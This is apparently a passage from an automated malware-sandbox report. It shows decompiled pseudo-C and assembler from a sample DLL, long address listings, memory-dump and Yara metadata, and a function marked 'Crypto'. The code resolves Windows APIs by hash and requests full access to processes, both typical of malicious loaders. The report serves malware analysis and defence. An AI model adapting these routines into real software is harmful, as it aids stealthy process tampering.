												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E9AAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E9ACD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E9B38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E9AF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E9AF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E9B38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E9AF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 4);
								 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E9AF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E9B3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E9AF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E9AF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 4);
										 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E9AF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E9AF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E9B38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E9AF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E9B3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E9B38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9AF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}













































                                                                                                                                                  0x6e9aa4f2
                                                                                                                                                  0x6e9aa4f4
                                                                                                                                                  0x6e9aa4ff
                                                                                                                                                  0x6e9aa505
                                                                                                                                                  0x6e9aa509
                                                                                                                                                  0x6e9aa50e
                                                                                                                                                  0x6e9aa514
                                                                                                                                                  0x6e9aa524
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa526
                                                                                                                                                  0x6e9aa526
                                                                                                                                                  0x6e9aa531
                                                                                                                                                  0x6e9aa531
                                                                                                                                                  0x6e9aaaaf
                                                                                                                                                  0x6e9aaab1
                                                                                                                                                  0x6e9aaab2
                                                                                                                                                  0x6e9aaaf1
                                                                                                                                                  0x6e9aaaf5
                                                                                                                                                  0x6e9aab03
                                                                                                                                                  0x6e9aab11
                                                                                                                                                  0x6e9aab11
                                                                                                                                                  0x6e9aaafc
                                                                                                                                                  0x6e9aab17
                                                                                                                                                  0x6e9aab1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aab1c
                                                                                                                                                  0x6e9aab00
                                                                                                                                                  0x6e9aab01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa53b
                                                                                                                                                  0x6e9aa53b
                                                                                                                                                  0x6e9aa53f
                                                                                                                                                  0x6e9aa646
                                                                                                                                                  0x6e9aa646
                                                                                                                                                  0x6e9aa64b
                                                                                                                                                  0x6e9aa75c
                                                                                                                                                  0x6e9aa760
                                                                                                                                                  0x6e9aa765
                                                                                                                                                  0x6e9aa769
                                                                                                                                                  0x6e9aa893
                                                                                                                                                  0x6e9aa895
                                                                                                                                                  0x6e9aa899
                                                                                                                                                  0x6e9aa8a2
                                                                                                                                                  0x6e9aa8ab
                                                                                                                                                  0x6e9aa8af
                                                                                                                                                  0x6e9aa8b8
                                                                                                                                                  0x6e9aa8bf
                                                                                                                                                  0x6e9aa8c0
                                                                                                                                                  0x6e9aa8c4
                                                                                                                                                  0x6e9aa8c8
                                                                                                                                                  0x6e9aa8cc
                                                                                                                                                  0x6e9aa8ce
                                                                                                                                                  0x6e9aaa38
                                                                                                                                                  0x6e9aaa38
                                                                                                                                                  0x6e9aaa40
                                                                                                                                                  0x6e9aaa58
                                                                                                                                                  0x6e9aaa5a
                                                                                                                                                  0x6e9aaa5c
                                                                                                                                                  0x6e9aaa96
                                                                                                                                                  0x6e9aaa96
                                                                                                                                                  0x6e9aaa98
                                                                                                                                                  0x6e9aaa98
                                                                                                                                                  0x6e9aaa9b
                                                                                                                                                  0x6e9aaab6
                                                                                                                                                  0x6e9aaaca
                                                                                                                                                  0x6e9aaacd
                                                                                                                                                  0x6e9aaad2
                                                                                                                                                  0x6e9aaadd
                                                                                                                                                  0x6e9aaade
                                                                                                                                                  0x6e9aaae1
                                                                                                                                                  0x6e9aaae3
                                                                                                                                                  0x6e9aaaec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aaaec
                                                                                                                                                  0x6e9aaa9d
                                                                                                                                                  0x6e9aaaa1
                                                                                                                                                  0x6e9aaaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aaaaa
                                                                                                                                                  0x6e9aaa6d
                                                                                                                                                  0x6e9aaa7d
                                                                                                                                                  0x6e9aaa81
                                                                                                                                                  0x6e9aaa81
                                                                                                                                                  0x6e9aaa84
                                                                                                                                                  0x6e9aaa87
                                                                                                                                                  0x6e9aaa8a
                                                                                                                                                  0x6e9aaa90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aaa92
                                                                                                                                                  0x6e9aa8d6
                                                                                                                                                  0x6e9aa8d6
                                                                                                                                                  0x6e9aa8d8
                                                                                                                                                  0x6e9aa8dc
                                                                                                                                                  0x6e9aa8e1
                                                                                                                                                  0x6e9aa8e3
                                                                                                                                                  0x6e9aa8e7
                                                                                                                                                  0x6e9aa8ea
                                                                                                                                                  0x6e9aa8f2
                                                                                                                                                  0x6e9aa8f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa90b
                                                                                                                                                  0x6e9aa926
                                                                                                                                                  0x6e9aa928
                                                                                                                                                  0x6e9aa93b
                                                                                                                                                  0x6e9aa93d
                                                                                                                                                  0x6e9aa93f
                                                                                                                                                  0x6e9aa95a
                                                                                                                                                  0x6e9aa95a
                                                                                                                                                  0x6e9aa95e
                                                                                                                                                  0x6e9aa960
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa962
                                                                                                                                                  0x6e9aa965
                                                                                                                                                  0x6e9aa986
                                                                                                                                                  0x6e9aa9a5
                                                                                                                                                  0x6e9aa9ab
                                                                                                                                                  0x6e9aa9ae
                                                                                                                                                  0x6e9aa9b3
                                                                                                                                                  0x6e9aa9b4
                                                                                                                                                  0x6e9aa9b8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa9c0
                                                                                                                                                  0x6e9aa9c0
                                                                                                                                                  0x6e9aa9c2
                                                                                                                                                  0x6e9aa9ce
                                                                                                                                                  0x6e9aa9da
                                                                                                                                                  0x6e9aa9e4
                                                                                                                                                  0x6e9aa9e7
                                                                                                                                                  0x6e9aa9ea
                                                                                                                                                  0x6e9aa9ee
                                                                                                                                                  0x6e9aa9f5
                                                                                                                                                  0x6e9aa9f9
                                                                                                                                                  0x6e9aa9fd
                                                                                                                                                  0x6e9aa9fe
                                                                                                                                                  0x6e9aaa02
                                                                                                                                                  0x6e9aaa07
                                                                                                                                                  0x6e9aaa0c
                                                                                                                                                  0x6e9aaa10
                                                                                                                                                  0x6e9aaa14
                                                                                                                                                  0x6e9aaa1a
                                                                                                                                                  0x6e9aaa20
                                                                                                                                                  0x6e9aaa26
                                                                                                                                                  0x6e9aaa2c
                                                                                                                                                  0x6e9aaa31
                                                                                                                                                  0x6e9aaa32
                                                                                                                                                  0x6e9aaa32
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa9c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa965
                                                                                                                                                  0x6e9aa943
                                                                                                                                                  0x6e9aa954
                                                                                                                                                  0x6e9aa956
                                                                                                                                                  0x6e9aa958
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa958
                                                                                                                                                  0x6e9aa96b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa96b
                                                                                                                                                  0x6e9aa76f
                                                                                                                                                  0x6e9aa772
                                                                                                                                                  0x6e9aa774
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa77c
                                                                                                                                                  0x6e9aa77c
                                                                                                                                                  0x6e9aa77e
                                                                                                                                                  0x6e9aa77e
                                                                                                                                                  0x6e9aa78f
                                                                                                                                                  0x6e9aa791
                                                                                                                                                  0x6e9aa794
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa88a
                                                                                                                                                  0x6e9aa88b
                                                                                                                                                  0x6e9aa88d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa88d
                                                                                                                                                  0x6e9aa79a
                                                                                                                                                  0x6e9aa79d
                                                                                                                                                  0x6e9aa7a7
                                                                                                                                                  0x6e9aa7ac
                                                                                                                                                  0x6e9aa7ae
                                                                                                                                                  0x6e9aa7b4
                                                                                                                                                  0x6e9aa7bb
                                                                                                                                                  0x6e9aa7bf
                                                                                                                                                  0x6e9aa7c4
                                                                                                                                                  0x6e9aa7c8
                                                                                                                                                  0x6e9aac03
                                                                                                                                                  0x6e9aac17
                                                                                                                                                  0x6e9aac3a
                                                                                                                                                  0x6e9aac3f
                                                                                                                                                  0x6e9aac3f
                                                                                                                                                  0x6e9aa7df
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7ea
                                                                                                                                                  0x6e9aa7ef
                                                                                                                                                  0x6e9aa7f1
                                                                                                                                                  0x6e9aa7f6
                                                                                                                                                  0x6e9aa7fd
                                                                                                                                                  0x6e9aa802
                                                                                                                                                  0x6e9aa804
                                                                                                                                                  0x6e9aabc1
                                                                                                                                                  0x6e9aabd2
                                                                                                                                                  0x6e9aabec
                                                                                                                                                  0x6e9aabf1
                                                                                                                                                  0x6e9aabf1
                                                                                                                                                  0x6e9aa81a
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa833
                                                                                                                                                  0x6e9aa851
                                                                                                                                                  0x6e9aa856
                                                                                                                                                  0x6e9aa866
                                                                                                                                                  0x6e9aa883
                                                                                                                                                  0x6e9aa885
                                                                                                                                                  0x6e9aa885
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa79d
                                                                                                                                                  0x6e9aa653
                                                                                                                                                  0x6e9aa653
                                                                                                                                                  0x6e9aa655
                                                                                                                                                  0x6e9aa65c
                                                                                                                                                  0x6e9aa66a
                                                                                                                                                  0x6e9aa66c
                                                                                                                                                  0x6e9aa66f
                                                                                                                                                  0x6e9aa676
                                                                                                                                                  0x6e9aa678
                                                                                                                                                  0x6e9aa6a9
                                                                                                                                                  0x6e9aa6b8
                                                                                                                                                  0x6e9aa6ba
                                                                                                                                                  0x6e9aa6bc
                                                                                                                                                  0x6e9aa6da
                                                                                                                                                  0x6e9aa6dc
                                                                                                                                                  0x6e9aa6de
                                                                                                                                                  0x6e9aa6f1
                                                                                                                                                  0x6e9aa710
                                                                                                                                                  0x6e9aa716
                                                                                                                                                  0x6e9aa719
                                                                                                                                                  0x6e9aa730
                                                                                                                                                  0x6e9aa74c
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa6de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa6bc
                                                                                                                                                  0x6e9aa67c
                                                                                                                                                  0x6e9aa67c
                                                                                                                                                  0x6e9aa67e
                                                                                                                                                  0x6e9aa68f
                                                                                                                                                  0x6e9aa691
                                                                                                                                                  0x6e9aa693
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa69f
                                                                                                                                                  0x6e9aa6a0
                                                                                                                                                  0x6e9aa6a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa6a7
                                                                                                                                                  0x6e9aa695
                                                                                                                                                  0x6e9aa698
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa751
                                                                                                                                                  0x6e9aa751
                                                                                                                                                  0x6e9aa752
                                                                                                                                                  0x6e9aa752
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa545
                                                                                                                                                  0x6e9aa547
                                                                                                                                                  0x6e9aa547
                                                                                                                                                  0x6e9aa549
                                                                                                                                                  0x6e9aa550
                                                                                                                                                  0x6e9aa55e
                                                                                                                                                  0x6e9aa560
                                                                                                                                                  0x6e9aa564
                                                                                                                                                  0x6e9aa568
                                                                                                                                                  0x6e9aa56a
                                                                                                                                                  0x6e9aa598
                                                                                                                                                  0x6e9aa59b
                                                                                                                                                  0x6e9aa5a0
                                                                                                                                                  0x6e9aa5a4
                                                                                                                                                  0x6e9aa5a9
                                                                                                                                                  0x6e9aa5b0
                                                                                                                                                  0x6e9aa5b5
                                                                                                                                                  0x6e9aa5b7
                                                                                                                                                  0x6e9aab7e
                                                                                                                                                  0x6e9aab8f
                                                                                                                                                  0x6e9aabaf
                                                                                                                                                  0x6e9aabb4
                                                                                                                                                  0x6e9aabb4
                                                                                                                                                  0x6e9aa5cd
                                                                                                                                                  0x6e9aa5d2
                                                                                                                                                  0x6e9aa5d2
                                                                                                                                                  0x6e9aa5d2
                                                                                                                                                  0x6e9aa5d2
                                                                                                                                                  0x6e9aa5e4
                                                                                                                                                  0x6e9aa5e6
                                                                                                                                                  0x6e9aa5e8
                                                                                                                                                  0x6e9aa5f9
                                                                                                                                                  0x6e9aa5f9
                                                                                                                                                  0x6e9aa5ff
                                                                                                                                                  0x6e9aa604
                                                                                                                                                  0x6e9aa608
                                                                                                                                                  0x6e9aa60e
                                                                                                                                                  0x6e9aa615
                                                                                                                                                  0x6e9aa61a
                                                                                                                                                  0x6e9aa61c
                                                                                                                                                  0x6e9aab32
                                                                                                                                                  0x6e9aab43
                                                                                                                                                  0x6e9aab64
                                                                                                                                                  0x6e9aab69
                                                                                                                                                  0x6e9aab69
                                                                                                                                                  0x6e9aa633
                                                                                                                                                  0x6e9aa638
                                                                                                                                                  0x6e9aa638
                                                                                                                                                  0x6e9aa638
                                                                                                                                                  0x6e9aa638
                                                                                                                                                  0x6e9aa63b
                                                                                                                                                  0x6e9aa63b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa63b
                                                                                                                                                  0x6e9aa56e
                                                                                                                                                  0x6e9aa56e
                                                                                                                                                  0x6e9aa570
                                                                                                                                                  0x6e9aa581
                                                                                                                                                  0x6e9aa583
                                                                                                                                                  0x6e9aa585
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa591
                                                                                                                                                  0x6e9aa592
                                                                                                                                                  0x6e9aa596
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa596
                                                                                                                                                  0x6e9aa587
                                                                                                                                                  0x6e9aa58a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa63c
                                                                                                                                                  0x6e9aa63c
                                                                                                                                                  0x6e9aa63d
                                                                                                                                                  0x6e9aa63d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa549
                                                                                                                                                  0x6e9aa53f

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: daeae20ad8a60282741212b4c1060d354236a72f30242b1771ab4dc4bdd0796e
                                                                                                                                                  • Instruction ID: 672e73adae4e643cf96e1ffdd48bc33d19e8325bd20bf5168ae5ebe397150a7b
                                                                                                                                                  • Opcode Fuzzy Hash: daeae20ad8a60282741212b4c1060d354236a72f30242b1771ab4dc4bdd0796e
                                                                                                                                                  • Instruction Fuzzy Hash: 421272715082019FC754DFA8C884AAEB7E9EFD5718F108E1DEA99972A1DB70DD01CF42
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9A8428, Relevance: 1.8, Strings: 1, Instructions: 531COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E6E9A8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E9AB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E9AF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E9AF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E9B2234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E9AF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E9AF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E9AF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E9AF4BC(_t449 + 0x14, 0);
									_t180 = E6E9B2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E9AB5C4(_t449 + 0x34);
										E6E9AB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E9AF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E9AF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E9AB5C4(_t449 + 0x34);
										E6E9AB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E9ACA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E9AC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E9AF828(_t449 + 0x14, E6E9AF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E9AF4BC(_t449 + 0x14, E6E9AF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
